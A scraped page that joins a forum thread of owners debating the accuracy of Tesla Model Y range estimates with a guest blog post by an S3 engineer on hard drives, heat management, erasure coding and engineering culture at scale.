Since the only real use of the EPA range is to make relative comparisons between cars, and since it will be very wrong for any car outside of the specific speed, geography, and season the EPA tests in, the EPA should choose some arbitrary number that is not miles. Then no one will feel misled when they buy electric, and we'll still be able to make range comparisons between cars.
General range barely ever matters anyway. ICE drivers thinking of going electric always ask about range, but over a certain minimum level of range what really matters is the estimation accuracy for a specific drive and the confidence that a planned charging location will be working as expected. If both of these are very good, the GPS travel time estimates will always be accurate and you don't really need to think about anything, which is how most people approach driving these days anyway: just follow the GPS.
The next thing that matters are the distance of chargers from the average route (we need more at interstate rest stops!) and the availability of 220V chargers at any place you will spend the night. The latter is the weakest right now, IMHO, but it's improving as more people go electric.
I have a model Y. I hate almost everything about it. But most germane, The 'Battery meter' at the top of the display is total bunk. That's got to be 'rosy' numbers. It'll display a the battery in miles, but it's at least 25% inflated.
However if you punch in a destination, you'll get exact numbers, and those are insanely reliable. It claims (and I don't believe any claims coming from tesla) that it'll factor wind, elevation, temperature, etc. But regardless of what it factors in, it's on the money.
I think the range is inflated, but I can get close to it by driving like an absolute grandpa. I think it's possible, but not realistic.
The solution is to not show miles on the basic battery meter, just percentage. Maybe show a rage next to it - 130-160 miles. But that too honest.
ICE cars all show a percentage, and maybe additionally a mileage on newer cars. The fact that they threw that away is a little silly.
We rented one on a trip recently, super annoying to realize the dozen or so chargers in this beach town were actually incompatible or just too slow for real life.
On the way back to the drop off autopilot tried to slam us into the Bentley next us! It had been traveling the same direction as us for like 20 minutes and when we passed through an intersection it just jerked hard left and I had to correct it manually. Possible injuries notwithstanding I'm sure that would have surpassed my insurance coverage, which I've intentionally gone way above minimums on.
I know someone who bought an early Leaf to get to work and back. The stated range was 107 miles and their commute was 35 miles each way. The problem was that there was >2000 feet of elevation change.
I also have a Model Y- it's our family's only vehicle. We love almost everything about it.
Tip: tap the range estimate to switch it to percent. The EPA estimate is meaningless. Yes, that should be improved.
Seems like it's common across all EVs for the range to be inflated by around 20%, at least for freeway driving.
In a recent review, a Tesla did a slightly better job than most of the cars tested, as far as portion of stated range achieved.
There is a reason why the mileage estimate on EVS are called GOMS (guess o meters). They are like laptops, totally unreliable. They should really just stick to percentages. I don't think anyone really relies on the mileage left in gas cars, that mentality should be carried over to EVs. The number is really the fault of the EPA which uses a synthetic tests and allows manufacturers to just run with that.
This is my experience too. If you plan your trip, it's really good about predicting the % battery remaining. I never put it on miles display anymore; that's evidently going to be inaccurate because it doesn't take into account many other factors. But if I enter in a route, now it actually has something to go on and can do a good job.
ICE vehicles have lower range as well when going uphill or exceeding the optimal speed and increasing air drag.
The estimates are based on driving on a flat road at the speed limit.
Even my Lexus SUV can get 24mpg driving on 35-45mph roads vs 16-19 in the city or going to the mountains where elevation increases.
People's understanding of range is just not quite there yet whether it's for an ICE vehicle or an EV.
If I hate something I would try to sell it immediately. Did you sell it?
Otherwise it looks to me that your rant is just for karma collecting.
'I hate almost everything about it.'
Not owning a car only using rentals, I still think Tesla has the best and most intuitive UI. I can find everything easily, whereas in a SUVs from Skoda/VW/Audi/BMW/Renault/... it's hard to find things - at least for me.
What I do hate about the Model Ys we rented is the noise! Wind/wheel noise is as loud at 100km/h as a BMW at 150km/h - I guess they do this to safe weight and increase range, but it makes the trips very unpleasant.
Also how it randomly breaks in self driving (at least on a German Autobahn).
I make EVs at a different company, and I'm not a fan of Tesla's range indicator. It's misleading because miles don't map directly onto battery charge. The range that that indicates is miles on flat level ground with no wind at 55mph which you will never experience in real life. At 80mph you're going to get 2/3 of that range every time. At 35mph you can get significantly higher range, but no one is ever going to drive 300+ miles at 35mph. If you just tap on the range icon it will change to percent, which is less misleading. ICE vehicles have all the same problems, but most ICE vehicles always just show gas level, rather than range.
Waited for 2 years for the new long range Tesla Model X and sold it within 3 months for exactly this reason. The range was a total fabrication - actual range for city driving was closer to 180 miles, not the claimed 300+. Complete sham.
> It'll display a the battery in miles, but it's at least 25% inflated.
Worth noting this is also common in ICE cars. Mine has it.
Rented a MY a couple months ago and was surprised how much I, and more surprisingly, my wife, hated it. Now, I despise Elon and the risky safety decisions of Tesla engineers, so I'm biased, but I wanted to give them a shot.
Range was horrible. We drove about 100 miles and spent a couple hours over several sessions at superchargers. The handling and turning radius sucked. The controls were frighteningly distracting and confusing. Sound in the cabin seemed very weird, probably due to the glass roof and noise cancelling system. Finally, for a dual motor, I expected a lot more acceleration. I drove a Chevy Bolt for a year and was surprised how heavy and sluggish the MY felt.
I find the range numbers on my Model Y to be fairly accurate, when I choose and am able to drive at optimal speeds on level ground (which is the situation on some trips). 60-65 MPH is the commonly sighted range for the dual motor Model Y. The range does attempt to factor in heat pump usage, and I am unclear how accurate those adjustments are.
For what it's worth, I have a Nissan standard petrol car and it's pretty much the same. Every time I fill it up, it says I have 400 miles of range, then by the time I've driven about 300 miles, I've only got a few miles of range left.
Interestingly the accuracy seems to get a lot better by the time I'm down to half a tank. I don't know if it's a sensor issue, or maybe my driving habits just change a lot when I have a full tank versus when I'm running low.
The type of driving and time I'm driving can also make a huge difference to my trip MPG - some trips I average about 10MPG, others closer to 40MPG. Generally speaking, low speed but clear rural roads get the best, followed by motorway, followed by pootering around the city. The absolute worst mileage is during the winter, when I might only be driving lots of short trips around town on a very cold engine, with the headlights on, in the rain. In that case, I might only get around 200 miles out of a tank.
Anyway, my point is that knowing the specifics of this trip's fuel consumption is a much easier problem than knowing how many miles it'll be until you next need to refuel.
Bummer to hear you all don't like it. I drove a RWD Long Range Model 3 for 4.5 years. Absolutely loved everything about it. But the range was no where near 310 miles like stated. But I couldn't have really cared less once I knew that fact. The few times a year I needed more than 200 miles, I used superchargers on my route just like I would if I had 250-300 and had to wait an extra 2 minutes at the charger. I averaged ~300-325 wh/m going 80-90mph on the highway (wind speed/direction obviously makes a big difference). 75kwh battery. 230 mile range. Every other day was charge to 80%, incredibly convenient to never think about it or gas and have more torque, speed than any other car you're around. And low to no maintenance.
I now own a Long Range Model X. It is MUCH closer to the EPA mileage. I average ~330wh/m but I have a 100kwh battery, so much closer to a legitimate 300 mile range. Once again, doesn't really make a different unless you happen to have an exact 275 mile trip. Either way, you'll be stopping at a halfway supercharger to stay in optimal charge range (15-85%).
It is true that it's very accurate. I was on a trip that predicted 22% battery on arrival, and I had 21%. The last 5-10km were mostly descending down a valley, so lot of regeneration. Thus, when I arrived, 22%, as predicted.
It's very easy to see how favorably or unfavorably Tesla's claimed range compares to competitors based on independent tests of multiple EVs in the same conditions:
https://www.youtube.com/watch?v=6LWL90paufE
https://www.youtube.com/watch?v=ynCaTDR4rDQ
https://www.youtube.com/watch?v=eFB6hsYXDiA
https://www.youtube.com/watch?v=fvwOa7TCd1E
Spoiler alert: Tesla models fare about as well, if not better, than their EV cousins, hitting around 80% of the stated range in the wild.
The obvious question is why don't you sell the car if you hate everything about it.
Sunk cost and all that
Not defending Tesla but battery range is really hard without context. Kinetic energy is velocity^2, which means moving twice the speed takes 4X the energy. They probably can get the right estimate for a destination because it knows the speed limit for the route and using that as your velocity can give you a better answer.
This is not a hard concept, and it's rather surprising that this of all things is what you have issue with.
The battery icon is Miles of rated range, where "rated" means flat windless road at 60MPH and 70 degrees. Call it "standard" range if you will. The car has no idea where you're going so it uses the standard calculation.
When you set a destination it can now (and does) factor in elevation change, speed on given roads, wind speed, wind direction, temperature along the route, etc etc etc and is more accurate.
So your least favorite feature is one you openly admit to not using properly? If you want laser precise range estimation set a destination ffs. Or, if you're like most drivers you start every day with 200-300mi of range and unless you're going out of state you don't even think about range.
It's the same problem as displaying the battery percentage on your phone. you're more inclined to look at it, and will be more anxious when that number drops.
I wish Tesla would allow you to hide the battery percentage entirely (unless it drops below a threshold).
My EV6 reports a range that it also a loose estimate, but it seems based on recent driving behavior (ie, I was driving free and loose recently, so I may end up getting way more miles than it says, and vice versa)
Switch to %.
I know how far % will go. Very simple.
The miles is a PR stunt.
I actually got stranded once for some hours because of the mileage indicator!
Was driving back from a campsite that I turned out to not have charging compatibility with, but thought I had plenty of margin to get to the nearest charger. As I drove through the mountains however, I began noticing that a.) my battery was depleting much faster than expected and b.) I wasn't seeing any houses and very few motorists. I watched with increasing dread as the trip miles began converging with the battery miles, as my friends in the car got more and more quiet. We reached the inflection point, and the best I could do was hope we'd encounter somewhere with a plug that might be able to get us the rest of the way. Eventually though the milage indicator reached zero, and I pulled off the road to what I thought was a campsite but turned out to be a sort of rest stop with no power plugs in sight. To make matters worse I was in a mountain valley and had no phone signal, and hiking wasn't an option as it was pretty hot and we had no water. We were there for hours until I was able to flag down a nice older couple and get a ride to a place with cell signal, where I was able to get a tow truck capable of transporting my car (turns out you need one that has a full bed because of the regenerative breaking, and tesla's service doesn't have infinite coverage) to the charger I was trying to get to.
Ironically that last part was probably the most frustrating. The charging spot was full save one spot in the back, which my tow truck guy Mel couldn't get back to. No sweat I thought, I'll just try asking someone to swap, but people in their cars pretended to ignore me, and one couple leaving theirs just walked away, as I asked if they could move so we could unload my dead car. Had a sudden wave of empathy for the people I usually walk away from who ask me for spare change lol. Eventually someone left and I was able to charge and resume the 6 hour road trip home. Biggest lesson learned was that slow is fast, keep it at 60 if you want the milage meter to not die as quick.
Battery meter at the top is EPA range - ie. the official range measurement method, in basically ideal conditions.
The routefinder 'learns' from your previous driving habits. Driving style easily has a 50% impact on range between 'drives 50 mph slipstreaming behind a truck' and 'drives 90 mph and brakes aggressively at every corner'.
https://www.fueleconomy.gov/feg/browseList.jsp
Judging by this the EPA numbers it gives are accurate on average.
I had a Tesla Model 3 which was very optimistic with the range. My BMW iX3 however is quite conservative and I can usually drive longer than the display states.
I recommend tapping the battery meter to put it into percent instead of EPA miles (useless, misleading) and only estimate range using the trip planner, which is usually quite good.
Shenanigans like that is how you end up with regulations on what car can display in terms of range. This is similar to how we ended up with strict rules on MPG when purchasing.
While there are things to hate on with Tesla cars, range is not one of them. I have a Model Y and for the most part I like it. I plug it in when it needs charging. What's so hard about that? I've been on several 6000+ mile journeys across the country and never had a problem, even out west where charging is more sparse.
The thing I hate most about my car is that I spent $10K on 'Full Self Driving' and rarely use it. It totally sucks and is definitely the worst $10K I've ever spent on anything. That money could have gone to a nice vacation somewhere and I would be happy about that. But no, every time I try out the FSD, I come away disappointed.
> I have a model Y. I hate almost everything about it.
Can you tell more about this? I'm curious.
This has been my experience as well. When there's a disparity, the Energy app gives additional details why the estimate was wrong (driving speed, climate control, etc).
It's what drives me nuts about '300 miles is more than enough'.
Consider:
- batteries lose, best case, about 10-20% of max range over a typical car ownership period
- not charging to the max is very often important to not getting bad degradation, so take another 10% off
- winter can take 10-20% range off
- driving at typical speed as opposed to the alleged ratings is probably another 10-20% reduced range
- headwinds, air conditioning/heating, and other factors can remove another 10-20%.
So suddenly, some 300 mile rated range is actually 150 miles of real world range. So here in the midwest, with underinvested charging infrastructure and biiiiiiggggg states and rural density, a 400 mile range really is pretty much required for any functional long distance driving.
What does the regular display claim to represent?
Coasting on a flat surface at 35mph with a positive tailwind?
> I hate almost everything about it.
By convention, you are required to phrase this as 'I love my Tesla, but...'
Inside the Nevada team's office, some employees celebrated canceling service appointments by putting their phones on mute and striking a metal xylophone, triggering applause from coworkers who sometimes stood on desks.
That's a fairly amazing display of corporate customer contempt. Shareholders couldn't have shown more disdain for their consumers.
Shareholder disdain and lying on estimates made the stock price go up. They couldn't be happier.
I think it's also an opportunity for each of us to appreciate the frailness of the human condition. In particular, how plastic our minds our, how susceptible to 'narrative' and social pressure (particularly when connected to income) we are. I imagine those employees are pretty normal people, and they were just responding to incentives. They didn't feel they were harming anyone, and in fact were doing a good job according to their bosses. They work at a famous, respected company and surely if the bosses were wrong that would not be the case, right?
This is the utility of the cynic, the questioner, the doubter, the non-conformist. It is an uncomfortable position, at all times, but you need people among you who constantly fear being inadvertently, mindlessly immoral. Because it's a constant threat and more of a threat, I daresay, than overt evil.
795 points 5 days ago by werner in 2565th position
www.allthingsdistributed.com | Estimated reading time – 34 minutes | comments | anchor
Today, I am publishing a guest post from Andy Warfield, VP and distinguished engineer over at S3. I asked him to write this based on the Keynote address he gave at USENIX FAST '23 that covers three distinct perspectives on scale that come along with building and operating a storage system the size of S3.
In today's world of short-form snackable content, we're very fortunate to get an excellent in-depth exposé. It's one that I find particularly fascinating, and it provides some really unique insights into why people like Andy and I joined Amazon in the first place. The full recording of Andy presenting this paper at fast is embedded at the end of this post.
–W
I've worked in computer systems software — operating systems, virtualization, storage, networks, and security — for my entire career. However, the last six years working with Amazon Simple Storage Service (S3) have forced me to think about systems in broader terms than I ever have before. In a given week, I get to be involved in everything from hard disk mechanics, firmware, and the physical properties of storage media at one end, to customer-facing performance experience and API expressiveness at the other. And the boundaries of the system are not just technical ones: I've had the opportunity to help engineering teams move faster, worked with finance and hardware teams to build cost-following services, and worked with customers to create gob-smackingly cool applications in areas like video streaming, genomics, and generative AI.
What I'd really like to share with you more than anything else is my sense of wonder at the storage systems that are all collectively being built at this point in time, because they are pretty amazing. In this post, I want to cover a few of the interesting nuances of building something like S3, and the lessons learned and sometimes surprising observations from my time in S3.
S3 launched on March 14th, 2006, which means it turned 17 this year. It's hard for me to wrap my head around the fact that for engineers starting their careers today, S3 has simply existed as an internet storage service for as long as you've been working with computers. Seventeen years ago, I was just finishing my PhD at the University of Cambridge. I was working in the lab that developed Xen, an open-source hypervisor that a few companies, including Amazon, were using to build the first public clouds. A group of us moved on from the Xen project at Cambridge to create a startup called XenSource that, instead of using Xen to build a public cloud, aimed to commercialize it by selling it as enterprise software. You might say that we missed a bit of an opportunity there. XenSource grew and was eventually acquired by Citrix, and I wound up learning a whole lot about growing teams and growing a business (and negotiating commercial leases, and fixing small server room HVAC systems, and so on) – things that I wasn't exposed to in grad school.
But at the time, what I was convinced I really wanted to do was to be a university professor. I applied for a bunch of faculty jobs and wound up finding one at UBC (which worked out really well, because my wife already had a job in Vancouver and we love the city). I threw myself into the faculty role and foolishly grew my lab to 18 students, which is something that I'd encourage anyone that's starting out as an assistant professor to never, ever do. It was thrilling to have such a large lab full of amazing people and it was absolutely exhausting to try to supervise that many graduate students all at once, but, I'm pretty sure I did a horrible job of it. That said, our research lab was an incredible community of people and we built things that I'm still really proud of today, and we wrote all sorts of really fun papers on security, storage, virtualization, and networking.
A little over two years into my professor job at UBC, a few of my students and I decided to do another startup. We started a company called Coho Data that took advantage of two really early technologies at the time: NVMe SSDs and programmable ethernet switches, to build a high-performance scale-out storage appliance. We grew Coho to about 150 people with offices in four countries, and once again it was an opportunity to learn things about stuff like the load bearing strength of second-floor server room floors, and analytics workflows in Wall Street hedge funds – both of which were well outside my training as a CS researcher and teacher. Coho was a wonderful and deeply educational experience, but in the end, the company didn't work out and we had to wind it down.
And so, I found myself sitting back in my mostly empty office at UBC. I realized that I'd graduated my last PhD student, and I wasn't sure that I had the strength to start building a research lab from scratch all over again. I also felt like if I was going to be in a professor job where I was expected to teach students about the cloud, that I might do well to get some first-hand experience with how it actually works.
I interviewed at some cloud providers, and had an especially fun time talking to the folks at Amazon and decided to join. And that's where I work now. I'm based in Vancouver, and I'm an engineer that gets to work across all of Amazon's storage products. So far, a whole lot of my time has been spent on S3.
When I joined Amazon in 2017, I arranged to spend most of my first day at work with Seth Markle. Seth is one of S3's early engineers, and he took me into a little room with a whiteboard and then spent six hours explaining how S3 worked.
It was awesome. We drew pictures, and I asked question after question non-stop and I couldn't stump Seth. It was exhausting, but in the best kind of way. Even then S3 was a very large system, but in broad strokes — which was what we started with on the whiteboard — it probably looks like most other storage systems that you've seen.
S3 is an object storage service with an HTTP REST API. There is a frontend fleet with a REST API, a namespace service, a storage fleet that's full of hard disks, and a fleet that does background operations. In an enterprise context we might call these background tasks "data services," like replication and tiering. What's interesting here, when you look at the highest-level block diagram of S3's technical design, is the fact that AWS tends to ship its org chart. This is a phrase that's often used in a pretty disparaging way, but in this case it's absolutely fascinating. Each of these broad components is a part of the S3 organization. Each has a leader, and a bunch of teams that work on it. And if we went into the next level of detail in the diagram, expanding one of these boxes out into the individual components that are inside it, what we'd find is that all the nested components are their own teams, have their own fleets, and, in many ways, operate like independent businesses.
All in, S3 today is composed of hundreds of microservices that are structured this way. Interactions between these teams are literally API-level contracts, and, just like the code that we all write, sometimes we get modularity wrong and those team-level interactions are kind of inefficient and clunky, and it's a bunch of work to go and fix it, but that's part of building software, and it turns out, part of building software teams too.
Before Amazon, I'd worked on research software, I'd worked on pretty widely adopted open-source software, and I'd worked on enterprise software and hardware appliances that were used in production inside some really large businesses. But by and large, that software was a thing we designed, built, tested, and shipped. It was the software that we packaged and the software that we delivered. Sure, we had escalations and support cases and we fixed bugs and shipped patches and updates, but we ultimately delivered software. Working on a global storage service like S3 was completely different: S3 is effectively a living, breathing organism. Everything, from developers writing code running next to the hard disks at the bottom of the software stack, to technicians installing new racks of storage capacity in our data centers, to customers tuning applications for performance, everything is one single, continuously evolving system. S3's customers aren't buying software, they are buying a service and they expect the experience of using that service to be continuously, predictably fantastic.
The first observation was that I was going to have to change, and really broaden how I thought about software systems and how they behave. This didn't just mean broadening thinking about software to include those hundreds of microservices that make up S3, it meant broadening to also include all the people who design, build, deploy, and operate all that code. It's all one thing, and you can't really think about it just as software. It's software, hardware, and people, and it's always growing and constantly evolving.
The second observation was that despite the fact that this whiteboard diagram sketched the broad strokes of the organization and the software, it was also wildly misleading, because it completely obscured the scale of the system. Each one of the boxes represents its own collection of scaled out software services, often themselves built from collections of services. It would literally take me years to come to terms with the scale of the system that I was working with, and even today I often find myself surprised at the consequences of that scale.
It probably isn't very surprising for me to mention that S3 is a really big system, and it is built using a LOT of hard disks. Millions of them. And if we're talking about S3, it's worth spending a little bit of time talking about hard drives themselves. Hard drives are amazing, and they've kind of always been amazing.
The first hard drive was built by Jacob Rabinow, who was a researcher for the predecessor of the National Institute of Standards and Technology (NIST). Rabinow was an expert in magnets and mechanical engineering, and he'd been asked to build a machine to do magnetic storage on flat sheets of media, almost like pages in a book. He decided that idea was too complex and inefficient, so, stealing the idea of a spinning disk from record players, he built an array of spinning magnetic disks that could be read by a single head. To make that work, he cut a pizza slice-style notch out of each disk that the head could move through to reach the appropriate platter. Rabinow described this as being like "like reading a book without opening it." The first commercially available hard disk appeared 7 years later in 1956, when IBM introduced the 350 disk storage unit, as part of the 305 RAMAC computer system. We'll come back to the RAMAC in a bit.
Today, 67 years after that first commercial drive was introduced, the world uses lots of hard drives. Globally, the number of bytes stored on hard disks continues to grow every year, but the applications of hard drives are clearly diminishing. We just seem to be using hard drives for fewer and fewer things. Today, consumer devices are effectively all solid-state, and a large amount of enterprise storage is similarly switching to SSDs. Jim Gray predicted this direction in 2006, when he very presciently said: "Tape is Dead. Disk is Tape. Flash is Disk. RAM Locality is King." This quote has been used a lot over the past couple of decades to motivate flash storage, but the thing it observes about disks is just as interesting.
Hard disks don't fill the role of general storage media that they used to because they are big (physically and in terms of bytes), slower, and relatively fragile pieces of media. For almost every common storage application, flash is superior. But hard drives are absolute marvels of technology and innovation, and for the things they are good at, they are absolutely amazing. One of these strengths is cost efficiency, and in a large-scale system like S3, there are some unique opportunities to design around some of the constraints of individual hard disks.
As I was preparing for my talk at FAST, I asked Tim Rausch if he could help me revisit the old plane flying over blades of grass hard drive example. Tim did his PhD at CMU and was one of the early researchers on heat-assisted magnetic recording (HAMR) drives. Tim has worked on hard drives generally, and HAMR specifically for most of his career, and we both agreed that the plane analogy – where we scale up the head of a hard drive to be a jumbo jet and talk about the relative scale of all the other components of the drive – is a great way to illustrate the complexity and mechanical precision that's inside an HDD. So, here's our version for 2023.
Imagine a hard drive head as a 747 flying over a grassy field at 75 miles per hour. The air gap between the bottom of the plane and the top of the grass is two sheets of paper. Now, if we measure bits on the disk as blades of grass, the track width would be 4.6 blades of grass wide and the bit length would be one blade of grass. As the plane flew over the grass it would count blades of grass and only miss one blade for every 25 thousand times the plane circled the Earth.
That's a bit error rate of 1 in 10^15 requests. In the real world, we see that blade of grass get missed pretty frequently – and it's actually something we need to account for in S3.
Now, let's go back to that first hard drive, the IBM RAMAC from 1956. Here are some specs on that thing:
Now let's compare it to the largest HDD that you can buy as of publishing this, which is a Western Digital Ultrastar DC HC670 26TB. Since the RAMAC, capacity has improved 7.2M times over, while the physical drive has gotten 5,000x smaller. It's 6 billion times cheaper per byte in inflation-adjusted dollars. But despite all that, seek times – the time it takes to perform a random access to a specific piece of data on the drive – have only gotten 150x better. Why? Because they're mechanical. We have to wait for an arm to move, for the platter to spin, and those mechanical aspects haven't really improved at the same rate. If you are doing random reads and writes to a drive as fast as you possibly can, you can expect about 120 operations per second. The number was about the same in 2006 when S3 launched, and it was about the same even a decade before that.
This tension between HDDs growing in capacity but staying flat for performance is a central influence in S3's design. We need to scale the number of bytes we store by moving to the largest drives we can as aggressively as we can. Today's largest drives are 26TB, and industry roadmaps are pointing at a path to 200TB (200TB drives!) in the next decade. At that point, if we divide up our random accesses fairly across all our data, we will be allowed to do 1 I/O per second per 2TB of data on disk.
S3 doesn't have 200TB drives yet, but I can tell you that we anticipate using them when they're available. And all the drive sizes between here and there.
So, with all this in mind, one of the biggest and most interesting technical scale problems that I've encountered is in managing and balancing I/O demand across a really large set of hard drives. In S3, we refer to that problem as heat management.
By heat, I mean the number of requests that hit a given disk at any point in time. If we do a bad job of managing heat, then we end up focusing a disproportionate number of requests on a single drive, and we create hotspots because of the limited I/O that's available from that single disk. For us, this becomes an optimization challenge of figuring out how we can place data across our disks in a way that minimizes the number of hotspots.
Hotspots are small numbers of overloaded drives in a system that ends up getting bogged down, and results in poor overall performance for requests dependent on those drives. When you get a hot spot, things don't fall over, but you queue up requests and the customer experience is poor. Unbalanced load stalls requests that are waiting on busy drives, those stalls amplify up through layers of the software storage stack, they get amplified by dependent I/Os for metadata lookups or erasure coding, and they result in a very small proportion of higher latency requests — or "stragglers". In other words, hotspots at individual hard disks create tail latency, and ultimately, if you don't stay on top of them, they grow to eventually impact all request latency.
As S3 scales, we want to be able to spread heat as evenly as possible, and let individual users benefit from as much of the HDD fleet as possible. This is tricky, because we don't know when or how data is going to be accessed at the time that it's written, and that's when we need to decide where to place it. Before joining Amazon, I spent time doing research and building systems that tried to predict and manage this I/O heat at much smaller scales – like local hard drives or enterprise storage arrays and it was basically impossible to do a good job of. But this is a case where the sheer scale, and the multitenancy of S3 result in a system that is fundamentally different.
The more workloads we run on S3, the more that individual requests to objects become decorrelated with one another. Individual storage workloads tend to be really bursty, in fact, most storage workloads are completely idle most of the time and then experience sudden load peaks when data is accessed. That peak demand is much higher than the mean. But as we aggregate millions of workloads a really, really cool thing happens: the aggregate demand smooths and it becomes way more predictable. In fact, and I found this to be a really intuitive observation once I saw it at scale, once you aggregate to a certain scale you hit a point where it is difficult or impossible for any given workload to really influence the aggregate peak at all! So, with aggregation flattening the overall demand distribution, we need to take this relatively smooth demand rate and translate it into a similarly smooth level of demand across all of our disks, balancing the heat of each workload.
In storage systems, redundancy schemes are commonly used to protect data from hardware failures, but redundancy also helps manage heat. They spread load out and give you an opportunity to steer request traffic away from hotspots. As an example, consider replication as a simple approach to encoding and protecting data. Replication protects data if disks fail by just having multiple copies on different disks. But it also gives you the freedom to read from any of the disks. When we think about replication from a capacity perspective it's expensive. However, from an I/O perspective – at least for reading data – replication is very efficient.
We obviously don't want to pay a replication overhead for all of the data that we store, so in S3 we also make use of erasure coding. For example, we use an algorithm, such as Reed-Solomon, and split our object into a set of k "identity" shards. Then we generate an additional set of m parity shards. As long as k of the (k+m) total shards remain available, we can read the object. This approach lets us reduce capacity overhead while surviving the same number of failures.
So, redundancy schemes let us divide our data into more pieces than we need to read in order to access it, and that in turn provides us with the flexibility to avoid sending requests to overloaded disks, but there's more we can do to avoid heat. The next step is to spread the placement of new objects broadly across our disk fleet. While individual objects may be encoded across tens of drives, we intentionally put different objects onto different sets of drives, so that each customer's accesses are spread over a very large number of disks.
There are two big benefits to spreading the objects within each bucket across lots and lots of disks:
For instance, look at the graph above. Think about that burst, which might be a genomics customer doing parallel analysis from thousands of Lambda functions at once. That burst of requests can be served by over a million individual disks. That's not an exaggeration. Today, we have tens of thousands of customers with S3 buckets that are spread across millions of drives. When I first started working on S3, I was really excited (and humbled!) by the systems work to build storage at this scale, but as I really started to understand the system I realized that it was the scale of customers and workloads using the system in aggregate that really allow it to be built differently, and building at this scale means that any one of those individual workloads is able to burst to a level of performance that just wouldn't be practical to build if they were building without this scale.
Beyond the technology itself, there are human factors that make S3 - or any complex system - what it is. One of the core tenets at Amazon is that we want engineers and teams to fail fast, and safely. We want them to always have the confidence to move quickly as builders, while still remaining completely obsessed with delivering highly durable storage. One strategy we use to help with this in S3 is a process called "durability reviews." It's a human mechanism that's not in the statistical 11 9s model, but it's every bit as important.
When an engineer makes changes that can result in a change to our durability posture, we do a durability review. The process borrows an idea from security research: the threat model. The goal is to provide a summary of the change, a comprehensive list of threats, then describe how the change is resilient to those threats. In security, writing down a threat model encourages you to think like an adversary and imagine all the nasty things that they might try to do to your system. In a durability review, we encourage the same "what are all the things that might go wrong" thinking, and really encourage engineers to be creatively critical of their own code. The process does two things very well:
When working through durability reviews we take the durability threat model, and then we evaluate whether we have the right countermeasures and protections in place. When we are identifying those protections, we really focus on identifying coarse-grained "guardrails". These are simple mechanisms that protect you from a large class of risks. Rather than nitpicking through each risk and identifying individual mitigations, we like simple and broad strategies that protect against a lot of stuff.
Another example of a broad strategy is demonstrated in a project we kicked off a few years back to rewrite the bottom-most layer of S3's storage stack – the part that manages the data on each individual disk. The new storage layer is called ShardStore, and when we decided to rebuild that layer from scratch, one guardrail we put in place was to adopt a really exciting set of techniques called "lightweight formal verification". Our team decided to shift the implementation to Rust in order to get type safety and structured language support to help identify bugs sooner, and even wrote libraries that extend that type safety to apply to on-disk structures. From a verification perspective, we built a simplified model of ShardStore's logic, (also in Rust), and checked into the same repository alongside the real production ShardStore implementation. This model dropped all the complexity of the actual on-disk storage layers and hard drives, and instead acted as a compact but executable specification. It wound up being about 1% of the size of the real system, but allowed us to perform testing at a level that would have been completely impractical to do against a hard drive with 120 available IOPS. We even managed to publish a paper about this work at SOSP.
From here, we've been able to build tools and use existing techniques, like property-based testing, to generate test cases that verify that the behaviour of the implementation matches that of the specification. The really cool bit of this work wasn't anything to do with either designing ShardStore or using formal verification tricks. It was that we managed to kind of "industrialize" verification, taking really cool, but kind of research-y techniques for program correctness, and get them into code where normal engineers who don't have PhDs in formal verification can contribute to maintaining the specification, and that we could continue to apply our tools with every single commit to the software. Using verification as a guardrail has given the team confidence to develop faster, and it has endured even as new engineers joined the team.
Durability reviews and lightweight formal verification are two examples of how we take a really human, and organizational view of scale in S3. The lightweight formal verification tools that we built and integrated are really technical work, but they were motivated by a desire to let our engineers move faster and be confident even as the system becomes larger and more complex over time. Durability reviews, similarly, are a way to help the team think about durability in a structured way, but also to make sure that we are always holding ourselves accountable for a high bar for durability as a team. There are many other examples of how we treat the organization as part of the system, and it's been interesting to see how once you make this shift, you experiment and innovate with how the team builds and operates just as much as you do with what they are building and operating.
The last example of scale that I'd like to tell you about is an individual one. I joined Amazon as an entrepreneur and a university professor. I'd had tens of grad students and built an engineering team of about 150 people at Coho. In the roles I'd had in the university and in startups, I loved having the opportunity to be technically creative, to build really cool systems and incredible teams, and to always be learning. But I'd never had to do that kind of role at the scale of software, people, or business that I suddenly faced at Amazon.
One of my favourite parts of being a CS professor was teaching the systems seminar course to graduate students. This was a course where we'd read and generally have pretty lively discussions about a collection of "classic" systems research papers. One of my favourite parts of teaching that course was that about half way through it we'd read the SOSP Dynamo paper. I looked forward to a lot of the papers that we read in the course, but I really looked forward to the class where we read the Dynamo paper, because it was from a real production system that the students could relate to. It was Amazon, and there was a shopping cart, and that was what Dynamo was for. It's always fun to talk about research work when people can map it to real things in their own experience.
But also, technically, it was fun to discuss Dynamo, because Dynamo was eventually consistent, so it was possible for your shopping cart to be wrong.
I loved this, because it was where we'd discuss what you do, practically, in production, when Dynamo was wrong. When a customer was able to place an order only to later realize that the last item had already been sold. You detected the conflict but what could you do? The customer was expecting a delivery.
This example may have stretched the Dynamo paper's story a little bit, but it drove to a great punchline. Because the students would often spend a bunch of discussion trying to come up with technical software solutions. Then someone would point out that this wasn't it at all. That ultimately, these conflicts were rare, and you could resolve them by getting support staff involved and making a human decision. It was a moment where, if it worked well, you could take the class from being critical and engaged in thinking about tradeoffs and design of software systems, and you could get them to realize that the system might be bigger than that. It might be a whole organization, or a business, and maybe some of the same thinking still applied.
Now that I've worked at Amazon for a while, I've come to realize that my interpretation wasn't all that far from the truth — in terms of how the services that we run are hardly "just" the software. I've also realized that there's a bit more to it than what I'd gotten out of the paper when teaching it. Amazon spends a lot of time really focused on the idea of "ownership." The term comes up in a lot of conversations — like "does this action item have an owner?" — meaning who is the single person that is on the hook to really drive this thing to completion and make it successful.
The focus on ownership actually helps understand a lot of the organizational structure and engineering approaches that exist within Amazon, and especially in S3. To move fast, to keep a really high bar for quality, teams need to be owners. They need to own the API contracts with other systems their service interacts with, they need to be completely on the hook for durability and performance and availability, and ultimately, they need to step in and fix stuff at three in the morning when an unexpected bug hurts availability. But they also need to be empowered to reflect on that bug fix and improve the system so that it doesn't happen again. Ownership carries a lot of responsibility, but it also carries a lot of trust – because to let an individual or a team own a service, you have to give them the leeway to make their own decisions about how they are going to deliver it. It's been a great lesson for me to realize how much allowing individuals and teams to directly own software, and more generally own a portion of the business, allows them to be passionate about what they do and really push on it. It's also remarkable how much getting ownership wrong can have the opposite result.
